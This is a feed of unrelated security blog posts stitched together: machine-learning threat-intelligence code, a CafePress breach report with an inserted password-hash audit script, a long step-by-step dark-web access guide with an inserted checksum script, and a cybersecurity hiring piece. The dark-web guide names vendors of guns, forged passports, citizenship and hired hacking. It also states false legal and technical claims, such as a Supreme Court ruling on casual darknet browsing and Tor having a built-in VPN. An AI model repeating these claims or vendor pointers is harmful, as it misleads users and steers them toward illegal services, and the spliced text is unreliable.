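    capture the same idea; this form needs no ML library."""
    vecs = {}
    for sentence in corpus:
        toks = [t.lower() for t in tokenize(sentence) if t.lower() not in STOPWORDS]
        for i, t in enumerate(toks):
            vec = vecs.setdefault(t, Counter())
            for j in range(max(0, i - window), min(len(toks), i + window + 1)):
                if j != i:
                    vec[toks[j]] += 1
    return vecs


def cosine(a, b):
    """Cosine similarity of two sparse vectors (dict word -> count)."""
    dot = sum(a[k] * b[k] for k in a if k in b)
    na = math.sqrt(sum(v * v for v in a.values()))
    nb = math.sqrt(sum(v * v for v in b.values()))
    return dot / (na * nb) if na and nb else 0.0


def nearest(vecs, word, k=3):
    """The k words whose context vectors are most similar to `word`'s."""
    word = word.lower()
    ranked = sorted(((cosine(vecs[word], vecs[o]), o) for o in vecs if o != word),
                    reverse=True)
    return [o for _, o in ranked[:k]]


if __name__ == "__main__":
    emb = cooccurrence_embeddings(CORPUS)
    print(nearest(emb, "APT28"))
    print(token_features(tokenize(CORPUS[0]), 0))
```

On this tiny corpus the alias pair ends up closest because the two names occur in the same positions around the same words (used, deployed, spear-phishing, custom); in the post's real embeddings the same effect puts Sofacy and TG-4127 next to APT28. The stop-word filter matters: without it, words like "also" and "known" sit next to every actor name and crowd out the aliases.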

Figure 4. Architecture of training pipeline for extractor system

Machine learning for insightful, actionable intelligence

Using the system we developed, we automatically extracted the techniques known to be used by Emotet, a prominent commodity malware family, as well as a spread of APT actors that public documents refer to as Saffron Rose, Snake, and Muddy Water, and generated the following graph, which shows that there is a significant overlap between some techniques used by commodity malware and those used by APTs.

Figure 5. Overlaps in techniques used by commodity malware and APTs

In this graph, we can see that techniques like obfuscated PowerShell, spear-phishing, and process hollowing are not restricted to APTs, but are prevalent in commodity malware. Insights like this can be used by organizations to guide security investments. Organizations can place defensive choke points to detect or prevent these attacker techniques so that they can stop not only annoying commodity malware, but also the high-profile targeted attacks.

At Microsoft, we are continuing to push the boundaries on how machine learning can improve the security posture of our customers. The output of machine learning-backed threat intelligence will show up in the effectiveness of the protection we deliver through Microsoft Defender Advanced Threat Protection (Microsoft Defender ATP) and the broader Microsoft Threat Protection.

In recent months, we have extensively discussed how we’re using machine learning to continuously innovate protections in Microsoft Defender ATP, particularly in hardening against evasion and adversarial attacks. In this blog we showed another application of machine learning: processing the vast amounts of threat intelligence that organizations receive and identifying high-level patterns. More importantly, we’re sharing our approaches so organizations can be inspired to explore more applications of machine learning to improve overall security.

Bhavna Soman (@bsoman3)
Microsoft Defender ATP Research

Talk to us

Questions, concerns, or insights on this story? Join discussions at the Microsoft Defender ATP community.

Read all Microsoft security intelligence blog posts.

Follow us on Twitter @MsftSecIntel.

The post From unstructured data to actionable intelligence: Using machine learning for threat intelligence appeared first on Microsoft Security.

23M CafePress Accounts Compromised: Here’s How You Can Stay Secure

You’ve probably heard of CafePress, a custom T-shirt and merchandise company allowing users to create their own unique apparel and gifts. With a plethora of users looking to make their own creative swag, it’s no surprise that the company was recently targeted in a cybercriminal ploy. According to Forbes, CafePress experienced a data breach back in February that exposed over 23 million records including unique email addresses, names, physical addresses, phone numbers, and passwords.

How exactly did this breach occur? While this information is still a bit unclear, security researcher Jim Scott stated that approximately half of the breached passwords had been exposed through gaps in an encryption method called base64 SHA1. As a result, the breach database service HaveIBeenPwned sent out an email notification to those affected letting them know that their information had been compromised. According to Engadget, about 77% of the email addresses in the breach have shown up in previous breach alerts on HaveIBeenPwned.
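The "base64 SHA1" scheme the article mentions is an unsalted hash: every user with the same password gets the same stored string, so a single precomputed table covers all of them at once. The following added example (not McAfee's or CafePress's code) puts that scheme beside a salted, iterated PBKDF2 scheme and includes a small audit a defender can run over a stored-credential table to flag the weak pattern. The usernames and passwords are constructed; the 1000-iteration count in the sample table is only to keep the demo fast.

```python
"""Added example (not McAfee's or CafePress's code): an unsalted,
base64-encoded SHA-1 digest beside a salted, iterated scheme, plus an
audit that flags the weak pattern in a stored-credential table."""
import base64
import hashlib
import hmac
import os
from collections import Counter


def legacy_b64_sha1(password):
    """Unsalted SHA-1 of the password, base64-encoded (the scheme the article
    names). Deterministic: every user with the same password gets the same
    stored string, so one precomputed table covers them all."""
    return base64.b64encode(hashlib.sha1(password.encode()).digest()).decode()


def pbkdf2_hash(password, salt=None, iterations=600_000):
    """Salted, iterated PBKDF2-HMAC-SHA256. The per-user random salt makes
    equal passwords produce different stored strings; the iteration count
    slows down guessing. Output format: algorithm$iterations$salt$digest."""
    if salt is None:
        salt = os.urandom(16)  # fresh random salt for each record
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return "pbkdf2_sha256$%d$%s$%s" % (
        iterations,
        base64.b64encode(salt).decode(),
        base64.b64encode(dk).decode(),
    )


def pbkdf2_verify(password, stored):
    """Recompute with the stored salt and iteration count; compare in
    constant time so the check itself leaks nothing about the digest."""
    algo, iters, salt_b64, dk_b64 = stored.split("$")
    if algo != "pbkdf2_sha256":
        raise ValueError("unsupported scheme: " + algo)
    salt = base64.b64decode(salt_b64)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, int(iters))
    return hmac.compare_digest(dk, base64.b64decode(dk_b64))


def looks_like_b64_sha1(stored):
    """Audit heuristic: a 20-byte SHA-1 digest base64-encodes to exactly
    28 characters ending in '='."""
    if len(stored) != 28 or not stored.endswith("="):
        return False
    try:
        return len(base64.b64decode(stored, validate=True)) == 20
    except ValueError:  # binascii.Error is a ValueError
        return False


def audit(records):
    """records: {username: stored_value}. Returns (records in the legacy
    format, distinct stored values shared by more than one user). Shared
    values are the tell-tale sign of unsalted hashing."""
    weak = sum(1 for v in records.values() if looks_like_b64_sha1(v))
    counts = Counter(records.values())
    shared = sum(1 for c in counts.values() if c > 1)
    return weak, shared


# Constructed sample table: three users, two of whom chose the same password.
SAMPLE_PASSWORDS = {"alice": "Summer2019!", "bob": "Summer2019!", "carol": "correct horse"}
LEGACY_TABLE = {u: legacy_b64_sha1(p) for u, p in SAMPLE_PASSWORDS.items()}
# 1000 iterations only to keep the demo quick; use the default in production.
MODERN_TABLE = {u: pbkdf2_hash(p, iterations=1000) for u, p in SAMPLE_PASSWORDS.items()}

if __name__ == "__main__":
    print("legacy table audit (weak, shared):", audit(LEGACY_TABLE))
    print("modern table audit (weak, shared):", audit(MODERN_TABLE))
```

Running the audit over a real export is how a defender finds out whether a "50 percent" split like the one the article reports exists before an attacker does: the legacy half shows up as 28-character values with duplicates across users, the migrated half as self-describing strings that never repeat.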

Scott stated that those who used CafePress through third-party applications like Facebook or Amazon did not have their passwords compromised. And even though third-party platform users are safe from this breach, this isn’t always the case. With data breaches becoming more common, it’s important for users to protect their information as best as they can. Check out the following tips to help users defend their data:

  • Check to see if you’ve been affected. If you know you’ve made purchases through CafePress recently, use this tool to check if you could have been potentially affected.
  • Place a fraud alert. If you suspect that your data might have been compromised, place a fraud alert on your credit. This not only ensures that any new or recent requests undergo scrutiny, but also allows you to have extra copies of your credit report so you can check for suspicious activity.
  • Consider using identity theft protection. A solution like McAfee Identity Theft Protection will help you to monitor your accounts and alert you of any suspicious activity.

And, of course, stay on top of the latest consumer and mobile security threats by following me and @McAfee_Home on Twitter, listening to our podcast Hackable?, and ‘liking’ us on Facebook.

The post 23M CafePress Accounts Compromised: Here’s How You Can Stay Secure appeared first on McAfee Blogs.

How to Get on the Dark Web: A Step-by-Step Guide

Dark web, deep web, clear web – just words or more? Well, in seeing just how many of you are interested in hearing all about the dark wonders of the internet, I’ve decided to make this small dark web guide. So, if you want to learn all about Tor Onion, Silk Road, secret, hush-hush Governmental ops, and how to get on the dark web, of course, you came to the right place. Welcome to the shadows, my friends! I will be your guide.

WTH is the dark web anyway?

Now, before we dig into it, we’ll need to stage a little show-and-tell about the differences between the deep web, dark web, and clear net. I’ll start with the latter, because writer’s privilege. So, the clear web is the very first and very visible layer of the Internet. Basically, it’s what we see when we do a Google or Bing search for things like cat videos or popular YouTube songs.

From a technical standpoint, the clear web is the content that is indexed, crawled, and displayed by the various search engines. Unfortunately, the clear web accounts for approximately 4 percent of the Internet. So, if the clear web is only a very tiny portion of the Internet, what happened to the rest?

Deep web vs. dark web

Welcome to the deep web, the part of the Internet that’s not indexed by search engines. There’s nothing spooky about the deep web; it contains stuff like scientific white papers, medical records, tax-related info, PayPal subscriptions, army communique, and much more. Although the deep web’s hiding behind HTTPS forms, its contents can be accessed if you know what you’re looking for.

Most of the websites hosted on the dark web can be accessed on a credential basis. For instance, if your health provider has a website capable of displaying bloodwork tests online, that particular section will be hosted on the deep web – it will not be indexed by Google or Bing and can only be accessed via password.

Oh, nearly forgot to mention that the deep web accounts for about 90 percent of the entire Internet.

That’s about it about the clear web and the deep web.

Remember: Clear, Deep, and Dark.

What’s the dark web then? Well, if the clear web is Google’s BFF and the deep web, its secret lover, then the dark web can only be the evil twin or the oddball.

Accounting for 6 percent of the Internet, the dark web is a most peculiar blend – on the one hand, it’s a cesspool, a rendezvous place for drug dealers, black hat hackers, hitmen, and human traffickers. On the other hand, due to its covert nature (I’ll get to that in a sec), this Internet fold acts like a liaison between political outcasts and people in the free world. It’s also used by people who want to submit anonymous tips (whistleblowers).

The dark web is favored by both groups because of its ability to render anyone and anything invisible. Privacy and anonymity are what you might consider the core values of the darknet. There’s no such thing as a mother-server that hosts the entire dark web, but rather a swarm of servers and nodes that can only be accessed through onion-type links. So, what are those?

More on Tor Onions

Since everything’s decentralized on the dark web, there are no crawlers to bring together the information. Even the URLs, if we can call them that, are infinitely different from what we’re used to.

For instance, if you want to access a site like YouTube, all you need to do is to write the URL in the address bar (i.e. https://youtube.com) or search for the website using google.com. Now, on the dark web, you’ll have to know the URL right to the last decimal and character to access it. All dark web addresses contain seemingly random strings comprised of numbers and letters, followed by a .onion extension.

Again, we shouldn’t lose sight of the fact that the dark web’s the place where the bulk of criminal activities take place. Every little sordid detail you heard over the news about the dark web is painfully true.

This is the place where hackers come to purchase data stolen from users or companies or offer their services in exchange for Bitcoins or other forms of cryptocurrency. More than that, if you dare to dig deep enough, you can uncover other hair-raising activities such as human trafficking, child pornography, torture, or murder on demand.

Charming little spot, isn’t it? Well, that’s where we’re heading. Now, before you can access the dark web, there are a couple of things you must do, security-wise. Ready? Set? Go!

Preparing to set sail

Source: WikiHow

#1. Install a VPN

VPNs are a must when you’re attempting to access the dark web. Why? Because of the long arm of the law, of course. Technically, you are free to surf on this Internet layer, provided that you don’t engage in any illegal activities. However, a recent ruling by the US Supreme Court deemed that even casually browsing the darknet can get you in a lot of hot water.

This means that if the authorities intercepted your darknet connection request, they would have enough reason to search your house and confiscate the machine used for browsing. So, do yourself a favor and download a VPN before messing about on the dark web. Need a hand picking one? Check out this article written by one of my colleagues to narrow down your search.

#2. Install an adequate browser

The first rule of the dark web – never, ever use your default browser to search for stuff on the darknet. Popular browsers like Chrome, Opera, or Firefox have tracking technologies that make you very visible on the authorities’ radar. So, if you’re still willing to do this, I would recommend you download Tor, which is, by far, the safest and easiest-to-use onion browser.

Of course, there are others who would argue that Tor being made by the military for covert communication makes it unreliable, privacy-wise, since it’s believed to be watched. I wouldn’t take that one for granted, but, then again, there’s no smoke without fire. It’s all up to you.

Of Tor, VPNs and other demons

Anyway, going back to Tor – why use this particular browser over a regular one? Well, that’s a rather long story, but worth telling nonetheless. As you know, a regular browser mediates between the user’s search request and the site about to be accessed. Normally, your query will go through the ISP’s DNS, which in turn consults other resources to help you get the answer you were looking for.

Now, with Tor, the search request kind of bounces around multiple Tor relays before completing your search request. You’re probably wondering what the heck Tor relays are. Well, what we call the clear web is, in fact, a conglomerate of servers, which are managed either by companies or on a volunteer basis.

The same principle applies more or less to what we call the dark web. Since it’s the dark side of the Internet we’re dealing with here, secrecy and untraceability become inherent. Thus, the info’s stored on Tor relays which are managed by volunteers.

So, what happens when you want to access a dark web onion? First of all, if you followed my advice and installed a VPN, the tunneling signal will be encrypted. This means that your ISP won’t have a clue about what you’re about to search for. Sure, it can still see that you want to access a Tor node, but other than that it’s blinder than a mole.

From there, it will be redirected to another node and then another one. Why does it do that? For anonymity reasons, of course; no breadcrumbs means that there’s no way for someone to trace the signal back to you.

VPN Only? Unlikely.

Congrats! You just took the first steps of your dark web journey. Still, there are a couple more precautions you must take before you can pop open Pandora’s box of dark Internet wonders. Getting back to Tor and VPN: there’s no broad consensus on dark web safety.

However, everyone tends to agree that using only Tor is not enough. The two of them (Tor and VPN) work in tandem and, as it happens, there are several ways of tunneling your way all the way through the dark web using this dynamic duo. Here’s what you need to know.

Method I – Tor over VPN

Sounds very techie, doesn’t it? Well, it’s really not that complicated – using the Tor over VPN method means connecting to a VPN service before using the Tor browser. Have to say that this is the most popular and safest method to access onion links, and, on my part, a marriage made in Heaven: Tor’s an excellent ‘anonymizer’, while VPN safeguards your privacy.

When using this method, Tor will encrypt your request, which will pass through your ISP unhindered. From there, it will go through a VPN server which conceals your IP and wipes geo-locations tags and other elements your Government or ISP might use to track the request.

Next step – your request will be transferred to a Tor entry node, which in turn transfers it to one or more Tor relays. From there, it gets slingshot to several Tor exit nodes. Afterwards, your request will be matched with the appropriate website. Tricky, but effective; that’s why it’s, by far, the best method to access dark web content.

Source: NordVPN

Pros of using Tor over VPN:
  • Session logs are not stored (metadata, IP address).
  • Traffic’s completely encrypted.
Con(s):
  • Doesn’t offer protection against malicious Tor exit nodes.

Method II – VPN over Tor

Not very safe, but it’s still usable. Recall how Tor over VPN works? Well, VPN over Tor is basically its opposite – instead of going through the VPN first, the signal passes through the Tor network before going through the VPN. Why is this method so unpopular? Because it’s not as safe as Tor over VPN.

If the signal goes through the Tor network first, your ISP will be able to see that you are attempting to connect to a Tor node. Though no one should bat an eye just because you’re attempting to access the dark web, keep in mind that in some countries, like the United States, even a simple foray can get you in trouble.

Pro(s) of using VPN over Tor:
  • Great if you trust your ISP, but not the VPN provider.
  • Can bypass blocked Tor nodes.
Con(s):
  • ISP can see you trying to access onion content.
  • Susceptible to end-to-end timing attacks.

Now, if you want to see what lurks in the dark corners of the Internet but don’t really trust Tor, there are alternatives. Here are a couple of them:

  1. I2P – great privacy protection and can access hidden onion links.
  2. Matrix.org – an open-source project just like Tor. Great for IoT data transfers, chats, and WebRTC signaling.
  3. Orbot – basically a Tor for Android.
  4. Globus Secure Browser – paid Tor alternative. VPN-powered. Allows the users to select preferred geolocation. If you want to take it for a spin, Globus features a five-day trial period.
  5. Comodo Ice Dragon – Firefox offspin. Employs multiple malware safeguards. Open-source project.
  6. FreeNet – open-source project. Sports the Darknet and OpenNet anonymous browsing technologies.

#3. Install a VM or disposable OS

I strongly recommend surfing on the dark web using virtual machine software instead of your locally installed Windows. Why? Because it’s easier to contain malware in a virtual environment, which can be fully controlled.

It’s like in those movies where the doctors are experimenting on deadly viral strains from behind the safety of a glass enclosure. And, as it happens, there are plenty of VMs to choose from: Oracle VM Virtualbox, VMware Fusion and Workstation, QEMU, Red Hat Virtualization, Microsoft Hyper-V, Citrix XenServer, and Xen Project, just to name a few.

Now, if you really want to take the physical storage devices out of the equation, you can use what I like to call a disposable operating system – easy to deploy and to get rid of if by chance you run into any trouble. All you’ll need is an 8GB thumb drive, an installation package, and a couple of minutes to get things up and running.

Let’s dig in.

How to install Tails OS

Source: TechSpot

Step 1. Get yourself a thumb drive; 8GB will do, but you can buy one with more space if you plan on using it for anything else. Nothing will happen to the stick (probably).

Step 2. Hop on the web and download the installation package for Tails OS.

Note: Tails is a Linux-based live operating system which can be booted from a USB stick or DVD. I recommend using a stick, since a DVD becomes read-only once you’re done burning it, and accessing the dark web requires a bit of writing.

Chill, because nobody will ever find a record of you ever fiddling around the darknet. Note that Tails’ installation package is the .img format, which means that you’ll need software capable of burning images on your thumb drive.

My recommendation is Universal USB Installer, which is very intuitive. You can also go along with Rufus. The choice is yours. For this tutorial, I’ve used Universal.

Step 3. Insert the stick and do a quick format. Be sure to use FAT32 to root out any compatibility issues. Shouldn’t take longer than a few seconds.

Step 4. Download and install Universal USB Installer or Rufus.

Step 5. Fire up Universal USB or Rufus.

Step 6. Under “Step 1: Select a Linux Distribution from the dropdown to put on your USB” select Tails.

Step 7. Under “Step 2: Select your ubuntu*desktop*.iso”, click on the browse button and select the downloaded Tails .img file.

Step 8. Under “Step 3: Select your USB Flash Drive Letter Only”, use the dropdown box to select your thumb drive’s letter. If it doesn’t show up, check the “now showing all drives” option.

Step 9. Review the info and hit Create when you’re done.

Note that the process can take anywhere from 5 to 30 minutes depending on your machine. Sit back, relax, and wait until the installation’s done. When you’re ready, hit the Close button and you’re all set.
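One step the walkthrough above skips is checking the downloaded image before writing it to the stick: a corrupted or substituted .img boots just as readily as a genuine one. The added example below (not from Heimdal or the Tails project) computes a SHA-256 digest in chunks and compares it, in constant time, against a published value. The `EXPECTED_SHA256` placeholder stands in for the digest you take from the Tails download page; `demo()` exercises the check on a constructed file instead, once intact and once with a single flipped byte.

```python
"""Added example (not from Heimdal or the Tails project): verify a downloaded
image against a published SHA-256 digest before writing it to the stick."""
import hashlib
import hmac
import os
import tempfile

# Placeholder: replace with the digest published for the release you downloaded.
EXPECTED_SHA256 = "<sha256 published by the Tails project for this release>"


def sha256_file(path, chunk_size=1 << 20):
    """Hex SHA-256 of a file, read in 1 MiB chunks so a multi-GB image
    does not have to fit in memory."""
    h = hashlib.sha256()
    with open(path, "rb") as f:
        for chunk in iter(lambda: f.read(chunk_size), b""):
            h.update(chunk)
    return h.hexdigest()


def verify_image(path, expected_hex):
    """True only if the file's digest matches the published one. The hex
    strings are normalised to lower case and compared in constant time."""
    actual = sha256_file(path)
    return hmac.compare_digest(actual.lower(), expected_hex.strip().lower())


def demo():
    """Self-check on a constructed stand-in for an image: the intact copy
    passes, a copy with one flipped byte fails."""
    data = os.urandom(3 * 1024 * 1024)  # constructed 3 MiB stand-in
    with tempfile.TemporaryDirectory() as d:
        good = os.path.join(d, "tails.img")
        with open(good, "wb") as f:
            f.write(data)
        expected = sha256_file(good)
        bad = os.path.join(d, "tails-tampered.img")
        with open(bad, "wb") as f:
            f.write(data[:-1] + bytes([data[-1] ^ 0x01]))
        return verify_image(good, expected), verify_image(bad, expected)


if __name__ == "__main__":
    print("intact ok, tampered ok:", demo())
    # Real use: verify_image("tails.img", EXPECTED_SHA256) before Step 3.
```

Only write the image with Universal USB Installer or Rufus once `verify_image` returns True for the real digest; a mismatch means the download, not the stick, is the problem.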

Now what? Well, now it’s time to fire up Tails and do a little bit of tinkering.

How to boot from USB and configure Tails

Bugged about your first boot? No worries. It always hurts the first time. Just follow these steps.

  1. Keep the thumb drive in the USB.
  2. Restart your computer.
  3. After the splash screen appears, press the appropriate Boot Menu key. If you’re tired of randomly pressing keys each time you perform this action, check out this article on hotkeys for the boot menu.
  4. Use your keyboard to select the corresponding drive letter. When you’re done, hit Enter.
  5. Wait for Tails OS to boot. Since this is the first time, it may take a while. Just be patient.
  6. Configure Tails and deploy Tor + VPN. Yes, the latest version of The Onion Router has an in-built VPN.
  7. Get ready to discover the dark and sometimes creepy wonders of the dark web.

So how do you get on the dark web?

All done installing and configuring Tor? Great! Fire it up and let’s surf. At first glance, Tor doesn’t look that different from your regular browser – it has a search bar, lots of quick-launch icons, the peeled onion icon smack in the middle of the screen. So, now what? Well, let’s start small.

Although content on the dark web is not as ‘indexed’ as content on the clear web, you can still use search engines to find stuff. The Hidden Wiki and Grams are the heavyweights here.

Yay, now I found everything my heart longs for. Not quite: since the dark web relies on privacy and anonymity, search engines like the Wiki and Grams frequently return false results. No matter – good or not, the Hidden Wiki is a great place to start exploring.

The Hidden Wiki & Co.

Think of the Hidden Wiki as Wikipedia’s evil twin – looks more or less the same, but contains links to various dark web categories: editor’s picks, volunteer, introduction points, financial services, commercial services, email\messaging, drugs (yes, it’s the real deal), blogs & essays, hosting providers, hacking services, darknet radio (nothing shady about that; just some weird electronic tunes and, occasionally, a bit of jazz), literature (mostly resources on hacking, both ethical and black hat).

You can also find quick links here to the stuff that makes the dark web pitch-black dark: contract killers, rape, torture, or murder on demand, child pornography.

Fortunately, in Hidden Wiki, every website is followed by a brief description so that the user knows what to expect (or not). My advice to you would be to stick with the editor’s pick. You can also take a look at the blogs & essays section if you want to find some nifty coding resources.

If you’re feeling chatty, you can always access a chat room. Services like Random Chat connect you with random people using the same service. What happens after that is all up to you.

You should stay away from everything labeled “porn”, “card skimming services”, “PayPal hacks”, “firearms”, “real fake IDs and passports”. Believe me – there’s plenty to go around, and each and every one of them is being kept under surveillance, not to mention the fact that you’ll get exposed to some stuff that will definitely make you take several cold showers.

Hidden Wiki’s not the only search engine online. Here are a couple of alternatives in case you get bored with Wiki.

  • DuckDuckGo – also available on the clear web. The best thing about DuckDuckGo is that it doesn’t track your searches. One can say that it’s the Google of the dark web.
  • Torch – considered the first dark web search engine, Torch boasts a database of several million onion links. Works just like Yelp. It even comes with recommendations, although most of them append websites like the infamous Silk Road.
  • WWW Virtual Library – if Torch and Hidden Wiki are old, the triple-W Virtual Library is Cthulhu-old; as in the elder god of search engines. What’s even better is the fact the WWW Virtual Library contains info dating back to the beginning of the Internet: logs, documents, pictures, and everything in between.

Fun fact: The Virtual Library was founded and, for a very long time, curated by none other than Tim Berners-Lee, the George Washington of the Internet. So, if you’re looking for obscure Internet facts, very old documents, Berners-Lee’s brainchild is the way to go.

  • Uncensored Hidden Wiki – think regular Hidden Wiki is bad? Wait till you see the uncensored version. As the name suggests, it emphasizes very illegal activities like human trafficking, drugs, pornography went wrong, and other things that fester in the dark corners of the human mind.
  • ParaZite – do you know the “want to get Lucky?” button in Google’s search engine? The one that takes you on a random clear web site? Well, ParaZite does the same thing. Sure, you can use it like any run-of-the-mill search engine, but if you’re feeling curious, you can also try the “feeling (un)lucky” feature. Proceed with caution and prepare to eject and torch the thumb drive.

Commercial Services

Believe it or not, the dark web even has online shops. And no, they don’t all sell drugs or firearms. Some of them are, reportedly, legit and have great bargains. For instance, if you want to buy a laptop or a smartphone, you can try your luck in one of these shops. Of course, all transactions are anonymous and Bitcoin-driven. Sure, you can use other cryptocurrencies if Bitcoin’s not your cup of tea.

The major issue with these websites is that a whopping 50 percent are fake, and there’s no way of telling for sure if they’ll deliver or not. By the way, most have shipping services.

Of course, you can’t use your home address for dark web drop-offs, but apparently, they can ship all over the world, minus some Middle Eastern countries and North Korea. To tell you the truth, I was tempted into purchasing a Samsung Galaxy S10 Plus; it was only 250 bucks. My advice: look, but don’t touch (buy).

Here are a couple of commercial services you can check out while you’re browsing the dark web:

  • CStore – any kind of electronics. You can make the purchases in cryptocurrency or gift cards. They even accept full escrow.
  • Apple Palace – everything Apple: laptops, desktops, phones, and accessories. All at ludicrously low prices.
  • EuroGuns – the name says it all: guns sold on the European market. The website even boasts that it’s the number one European arms dealer.
  • Kamagra for Bitcoins – if your boomstick ain’t working no more, you can try Kamagra, which is the dark web and cheap version of Viagra.
  • Gold & Diamonds – site offers ‘real’ diamonds and gold. (Un)fortunately, it only ships to Germany and the United States.
  • PirateSec – legit hackers, at your service!
  • Fake Passports – I think it’s self-explanatory.
  • SOL’s United States Citizenship – sells American citizenships; go figure.
  • Digital Gangster – the most gangsta way to hack someone’s computer. Apparently, these are Ronin hackers who can be hired for exploits, web hacking, password retrieval, and all-purpose espionage.
  • Onion Identity Services – summer discounts for IDs and passports. Bitcoins only.

Email clients

Always remember that the dark web is a people-centric community. So, it’s only natural to find ways to keep in touch with your darknet buddies and\or customers. There are several email and IM services which you can use, and it’s highly recommended to pick one if you want to step up your dark web game.

In terms of functionality, I don’t think there are too many differences between regular IMAP, POP3, and SMTP services and the stuff you can use to communicate on the dark web. Let’s start with the email clients.

  • secMail – full-fledged email service. Pretty simplistic in design: you can compose, send, and receive emails. All the great things about an email client, minus the tracking, eavesdropping, and other privacy issues.
  • Lelantos – pay-to-use email service. Great security and privacy features, but it has one of the most unreliable and sidetrackable registration forms. Proceed at your own risk.
  • Bitmail.la – another pay-to-use email client. Has many features like IMAP, SMTP, and POP3 support, and a 500MB mailbox. Apparently, a lifetime membership costs $0.60.
  • Mail2Tor – a free email service which, reportedly, works on both dark and clear web.
  • Guerilla Mail – creates a disposable email address.
  • AnonInbox – pay-to-use email client. Supports IMAP, SMTP, and POP3; charges around 0.1 BTC per year.
  • Protonmail – has both paid and free subscriptions. Boasts the browser-encrypted email technology.

Chat\Social Media

Right. Let’s now talk about social media and instant messaging. Believe it or not, Zuckerberg’s Facebook has a darknet version. It’s mostly used for covert communication, anonymous tips submission, and stuff like that.

Sure, it’s not as secure as the clear web version, but it’s there and totally legal to use. Hidden Facebook is hardly the only social media client on the dark web. Check out the list below for the ‘hottest’ dark web clients.

  • BlackBook – works much like Facebook: you can chat, send pictures and friend requests, post status updates, and join groups. Though it competes head-to-head with Facebook’s onion site, BlackBook is prone to hacking; reportedly it was taken offline at least a couple of times in 2018.
  • Torbook – very similar to BlackBook. Some claim that both appeared at around the same time, despite the creators not knowing each other.
  • The Campfire – gather around the campfire, folks, to hear the tale of tales. The name is suggestive: one big chatroom that anyone can join, with topics ranging from the latest trends in the music industry to how to hide a body.
  • Lucky Eddie’s Home – scripted chat room with one of the most efficient file-upload systems on the dark web. As with any IM app, you can send and receive messages, join or create groups, and send files.
  • MadIRC Chat Server – if you’re over 30, you certainly remember the mIRC era. Surprisingly, IRC spin-offs are still in use today, mostly for covert conversations or intranet communication. MadIRC works just like regular IRC: no registration or subscription required. Just pick a username and join in. Sharing is caring, but in this case don’t share any personal details, because you never know who is on the other end of the line.
  • Chat with strangers – think Omegle, but on the dark web. Fire up the client, connect to a chat room, and that’s it. You can’t send or receive files. Still, if you’re lucky, you might get a scintillating conversation out of it.

Journalism and advocacy groups

As I’ve mentioned, the dark web isn’t just a place of eternal torment teeming with drug dealers, human traffickers, and hitmen. It’s also used by journalists, advocacy groups, and political refugees in hiding. Reuters, Fox, NBC, CNN: all of them keep dark web tip lines open (typically a SecureDrop-style onion service) to receive anonymous tips from whistleblowers.

Advocacy groups also benefit from the darknet because censorship is much harder to impose there. And finally there are political outcasts, refugees, and people who want to reach the outside world from a totalitarian country that suppresses every other means of communication and information.

Of course, there are also the run-of-the-mill congregations, which will worship anything from Lucifer to the Flying Spaghetti Monster.

If you’re interested in independent or subversive journalism, here are a couple of sites you can try:

  • Soylent News – a cross-spectrum darknet news aggregator. Features moderated forums where you can comment, and you can get involved by submitting tips or writing stories.
  • ProPublica – historically the first major news outlet to launch a darknet edition, back in 2016. Since then ProPublica has exposed abuses of power and blown the lid off covert activities by government institutions. Although young compared to other news outlets, ProPublica’s work has earned it five Pulitzer Prizes, the most recent being the 2019 Feature Writing prize awarded to Hannah Dreier for her reporting on MS-13 on Long Island.

More on how to stay safe on the dark web

I’ve already gone through VPNs, anonymizing browsers, and disposable operating systems, so I won’t repeat those. Here are some other things you can do to bolster your security.

1. Don’t maximize or resize your Tor Browser window

Sounds odd, doesn’t it? But there’s a reason: a website can read your browser window’s dimensions, and an unusual window size makes you easier to fingerprint (yes, they really can do that). Tor Browser deliberately opens at a standard, rounded size so that you look like every other Tor user; maximizing it or dragging it to a custom size throws that protection away. So do yourself a favor and leave the window at the size it opened with.

2. Tweak the security settings

Tor Browser has a built-in security slider. Click the onion icon and choose Security Settings, then move the slider to Safest. At that level JavaScript is disabled on every website, and some fonts, symbols, images, and media will not be displayed.

3. Never use your credit and debit card for purchases

I’ll go further than that and say stay away from darknet shops altogether. Maybe some of them are legit, but are you really willing to take that chance? Still, if you’re really itching to buy a new phone or God knows what else, stick with Bitcoin or your favorite cryptocurrency, and remember that Bitcoin is pseudonymous, not anonymous: every transaction sits on a public ledger. Paying with a credit or debit card for this sort of thing is like painting a big bullseye on your bank account while yelling: “come here and take my money.”

4. Close Tails after finishing your session

When you’re done surfing or shopping on the dark web, don’t forget to shut Tails down properly. The big advantage of a live OS such as Tails is that it runs from memory and writes nothing to the computer’s hard disk; on shutdown it wipes RAM, so no trace of your session remains (unless you deliberately set up Tails’ persistent storage on the USB stick). A DVD works too, but it can’t be updated in place, which is why a USB stick is the usual choice.

5. Don’t stick your nose where it doesn’t belong

Great life advice, and even more valuable where the darknet is concerned. Keep in mind that many criminal organizations use the dark web to communicate or sell merchandise, and some of those channels are under watch. You could end up in the middle of a stakeout that turns ugly. So if a website looks fishy, close the tab and forget about it.

Wrap-up

This is where I get off. It’s been a long journey and I hope I’ve managed to at least change your perspective on the dark web. So, to wrap it up nice and tight: take all the necessary precautions, refrain from using your debit or credit card, stay away from dubious groups, and have fun while you’re at it. As always, for comments, rants, ad-libs, or beer donations, leave me a comment. Cheers!

The post How to Get on the Dark Web: A Step-by-Step Guide appeared first on Heimdal Security Blog.

How should enterprises fill the rising talent gap in cybersecurity?


The cyber threat landscape is one of the most talked-about issues across industries today. The dynamic nature of cyberattacks makes cybersecurity anything but a stable function. Cybercriminals are looking for new ways to attack enterprise systems every day. Trends change quickly: yesterday’s threats can be outdated tomorrow, and what works as a countermeasure today may have no effect tomorrow.

No wonder, then, that cybersecurity as a core enterprise function struggles with a talent gap. A Frost & Sullivan report estimated that the global cybersecurity workforce will have more than 1.5 million vacancies by 2020. To fill this gap, enterprises need to be agile and think on their feet when procuring cybersecurity talent.

If they don’t, the consequences could be disastrous: faced with mounting threats of varied nature and scale, an enterprise could find itself with unskilled personnel facing a real attack.

So how can enterprises find a sustainable solution to fill this gap?

Some pointers that enterprises can consider are –

Look beyond degrees

Cyber threats and the knowledge needed to defend against them are in a constant race with each other. Because the threat landscape keeps changing, the knowledge needed to fight those threats changes too. That inherently means it is not a skill that can be gauged well by conventional degrees.

Hence, instead of conforming to norms and force-fitting cybersecurity graduates into roles, enterprises must broaden their horizons: look beyond degrees and identify the underlying traits needed to solve cybersecurity problems when hiring.

Look for a culture fit

